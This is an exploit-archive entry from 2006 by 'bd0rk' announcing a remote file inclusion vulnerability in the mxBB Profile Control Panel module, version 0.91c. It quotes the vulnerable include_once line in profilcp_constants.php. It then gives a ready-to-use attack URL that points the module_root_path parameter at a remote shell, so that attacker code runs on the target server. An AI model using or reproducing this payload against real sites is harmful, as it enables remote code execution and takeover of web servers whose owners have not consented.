mxBB Module Profile CP 0.91c Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : mxBB Module Profile CP 0.91c Remote File Include Vulnerability
# Published : 2006-12-09
# Author : bd0rk
# Previous Title : TorrentFlux 2.2 (maketorrent.php) Remote Command Execution Exploit
# Next Title : Gizzar <= 03162002 (index.php) Remote File Include Vulnerability

###############################################################################
##                                                                           ##
## mxBB Module Profile Control Panel 0.91c Remote File Include Vulnerability ##
##                                                                           ##
## Bugfound3R: bd0rk || SOH-Crew                                             ##
##                                                                           ##
## Website: www.soh-crew.it.tt                                               ##
##                                                                           ##
## Greetz: str0ke, Lu7k, TheJT, Natok                                        ##
##                                                                           ##
###############################################################################

Download: http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=70

==> Vulnerable Code in profilcp_constants.php <==

Code: include_once($module_root_path . 'includes/lang_extend_mac.'.$phpEx);

Usage: http://[y0uRSiTe]/[direct0ry]/includes/profilcp_constants.php?module_root_path=http://Sh3LL?

# www.Syue.com [2006-12-09]